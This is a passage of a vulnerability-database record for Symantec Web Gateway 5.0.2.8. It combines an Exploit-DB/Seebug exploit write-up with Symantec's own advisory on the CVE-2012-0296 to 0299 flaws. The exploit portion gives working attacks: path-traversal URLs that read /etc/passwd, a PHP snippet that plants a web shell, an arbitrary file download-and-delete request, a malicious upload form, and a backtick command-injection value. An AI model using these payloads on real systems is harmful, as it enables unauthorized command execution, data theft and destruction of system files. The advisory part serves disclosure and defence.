web.\r\n There is an upload script: /ciu/uploadFile.php\r\n\tUser can control the filename and the upload location:\r\n $_FILES['uploadFile'];\r\n $_POST['uploadLocation'];\r\n\r\n 2.Method\r\n <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">\r\n <input type="file" name="uploadFile">\r\n <input type="text" name="action" value="upload">\r\n <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">\r\n <input type="hidden" name="configuration" value="test">\r\n <input type="submit" value="upload!">\r\n </form>\r\n\t\r\n\tThe "/var/www/html/spywall/cleaner" is writeable by www-data.\r\n\r\nCommand execution after authentication:\r\n\r\n http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\r\n\r\n From the modified POST message:\r\n Content-Disposition: form-data; name="pingaddress"\r\n 127.0.0.1`whoami>/tmp/1234.txt`\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73332", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-08-08T11:57:23", "description": "", "cvss3": {}, "published": "2012-06-27T00:00:00", "type": "exploitdb", "title": "symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-0297", "2012-0298", "CVE-2012-0297", "CVE-2012-0298"], "modified": "2012-06-27T00:00:00", "id": "EDB-ID:19406", "href": "https://www.exploit-db.com/exploits/19406", "sourceData": "Software: Symantec Web Gateway\r\nCurrent Software Version: 5.0.2.8\r\nProduct homepage: www.symantec.com\r\nAuthor: S2 Crew [Hungary]\r\nCVE: CVE-2012-0297, CVE-2012-0298, ???\r\n\r\nFile include:\r\n https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\r\n\r\nFile include and OS command execution:\r\n http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\r\n You can execute OS commands just include the error_log:\r\n /usr/local/apache2/logs/\r\n -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log\r\n -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log\r\n\r\n Make a connection to port 80:\r\n <?php\r\n $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');\r\n $cmd = \"<?php system(\\$_GET['cmd']); ?>\";\r\n fputs($f,$cmd);\r\n fclose($f);\r\n\t\tprint \"Shell creation done<br>\";\r\n ?>\r\n\r\nArbitary file download and delete:\r\n https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog\r\n\td parameter: the complete filename \r\n After the download process application removes the original file with root access! :)\r\n\r\n Command execution methods:\r\n 1.Method\r\n Download and delete the /var/www/html/ciu/.htaccess file.\r\n After it you can access the ciu interface on web.\r\n There is an upload script: /ciu/uploadFile.php\r\n\tUser can control the filename and the upload location:\r\n $_FILES['uploadFile'];\r\n $_POST['uploadLocation'];\r\n\r\n 2.Method\r\n <form action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"file\" name=\"uploadFile\">\r\n <input type=\"text\" name=\"action\" value=\"upload\">\r\n <input type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\">\r\n <input type=\"hidden\" name=\"configuration\" value=\"test\">\r\n <input type=\"submit\" value=\"upload!\">\r\n </form>\r\n\t\r\n\tThe \"/var/www/html/spywall/cleaner\" is writeable by www-data.\r\n\r\nCommand execution after authentication:\r\n\r\n http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\r\n\r\n From the modified POST message:\r\n Content-Disposition: form-data; name=\"pingaddress\"\r\n 127.0.0.1`whoami>/tmp/1234.txt`", "sourceHref": "https://www.exploit-db.com/download/19406", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-11-07T10:51:43", "description": "### SUMMARY\n\n \n\nSymantec's Web Gateway management GUI is susceptible to file include command injection/execution, file upload/execution and file download/deletion security issues. The management GUI is also susceptible to cross-site scripting (XSS). Successful exploitation could result in execution of arbitrary code in the context of the application, denial of service through deletion of arbitrary system files, and unauthorized access to users' data or to unauthorized network information.\n\n### AFFECTED PRODUCTS\n\n \n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**Solution** \n \n---|---|--- \n \nSymantec Web Gateway\n\n| \n\n5.0.x\n\n| \n\nSymantec Web Gateway 5.0.3 \n \n### ISSUES\n\n \n\n**CVSS2**\n\n**Base Score**\n\n| \n\n**Impact**\n\n| \n\n**Exploitability**\n\n| \n\n**CVSS2 Vector** \n \n---|---|---|--- \n \n**Command injection code execution - High** \n \n8.33\n\n| \n\n**10.0**\n\n| \n\n**6.45**\n\n| \n\nAV:A/AC:L/Au:N/C:C/I:C/A:C\n\n \n \n**File include/command execution - High** \n \n7.77\n\n| \n\n**9.2**\n\n| \n\n**4.65**\n\n| \n\nAV:A/AC:L/Au:N/C:C/I:C/A:N\n\n \n \n**File download/deletion- Medium** \n \n6.1\n\n| \n\n**6.9**\n\n| \n\n**6.5**\n\n| \n\nAV:A/AC:L/Au:N/C:N/I:N/A:C \n \n**Cross-site scripting - Medium** \n \n4.33\n\n| \n\n**4.93**\n\n| \n\n**5.54**\n\n| \n\nAV:A/AC:M/Au:N/C:P/I:P/A:N \n \n \n\nBID 53444 to the file include/command execution issues\n\nBID 53442 to the file download/deletion issues\n\nBID 53443 to the file upload/OS command execution issue\n\nBID 53396 to the XSS issues\n\nCVE-2012-0297 to the file include/command execution issues\n\nCVE-2012-0298 to the file download/deletion issues\n\nCVE-2012-0299 to the file upload/OS command execution issues\n\nCVE-2012-0296 to the XSS issues\n\n### MITIGATION\n\n \n\n**Details**\n\nSymantec was notified of multiple security issues impacting the management console of the Symantec Web Gateway Appliance. The management interface does not properly authenticate or filter external input. This could allow unauthorized access to user's session or network information. As a result of weak authentication and sanitization of user controlled input, arbitrary code could potentially be injected/included in application scripts used by the Symantec Web Gateway application potentially resulting in arbitrary command execution with application privileges. \n\nAdditionally, file management scripts in the Symantec Web Gateway interface do not properly filter user input, potentially resulting in an unauthenticated, unprivileged user downloading and deleting arbitrary files including essential operational files. This could render the targeted system unavailable or unusable depending on the success of such an attempt and files targeted. An unauthenticated, unprivileged user could also upload arbitrary code through the abuse of management scripts. A malicious user could be able to control the file name and location which could potentially result in arbitrary command execution with elevated privileges.\n\nCross-site scripting vulnerabilities were also reported in the Symantec Web Gateway Management Interface. Cross-site scripting is a trust exploitation generally requiring enticing a authenticated user to click on a malicious link. A successful exploitation, depending on the nature of the link, could potentially result in arbitrary java/html requests and scripts executed in the context of the targeted user.\n\nIn a normal installation, the Symantec Web Gateway management interface should not be accessible external to the network. However, an authorized but unprivileged network user or an external attacker able to leverage network access could attempt to exploit these weaknesses. \n\n \n\n**Symantec Response**\n\nSymantec engineers verified these issues and have released an update to address them. Symantec engineers reviewed related functionality to further enhance the overall security of Symantec Web Gateway. Symantec has released Symantec Web Gateway 5.0.3, currently available to customers through normal update channels.\n\nSymantec is not aware of any exploitation of, or adverse customer impact from these issues.\n\n \n**Best Practices**\n\nAs part of normal best practices, Symantec strongly recommends:\n\n * Restrict access to administration or management systems to privileged users.\n * Disable remote access or restrict it to trusted/authorized systems only.\n * Keep all operating systems and applications updated with the latest vendor patches.\n * Follow a multi-layered approach to security. Run both firewall and anti-malware applications, at a minimum, to provide multiple points of detection and protection to both inbound and outbound threats.\n * Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in detection of attacks or malicious activity related to exploitation of latent vulnerabilities\n\n### ACKNOWLEDGEMENTS\n\n \n\nSymantec credits Tenable Network Security working through TippingPoint's [ZeroDay Initiative](<http://www.zerodayinitiative.com/>) for reporting file include, command injection/execution and file download/deletion and upload/execution issues.\n\n \n\nSymantec credits an anonymous contributor working with Beyond Security's SecuriTeam Secure Disclosure project ([http://www.beyondsecurity.com/ssd.html](<http://www.beyondsecurity.com/ssd.html>) for reporting file include, command injection/execution; file download/deletion and upload/execution issues.\n\n \n\nSymantec credits Ajay Pal Singh Atwal and an anonymous finder for reporting the cross-site scripting issues.\n\n### REFERENCES\n\n \n\n**BID:** Security Focus, [http://www.securityfocus.com](<http://www.securityfocus.com/>), has assigned the following Bugtraq IDs (BID) to these issues for inclusion in the Security Focus vulnerability database.\n\n**CVE:** These issues are candidates for inclusion in the CVE list ([http://cve.mitre.org](<http://cve.mitre.org/>)), which standardizes names for security problems. The following CVE IDs have been assigned.\n", "cvss3": {}, "published": "2012-05-17T08:00:00", "type": "symantec", "title": "Symantec Web Gateway Multiple Security Issues", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"], "modified": "2020-03-05T20:47:00", "id": "SMNTC-1250", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Symantec Web Gateway 5.0.2.8 Command Execution

Description

Related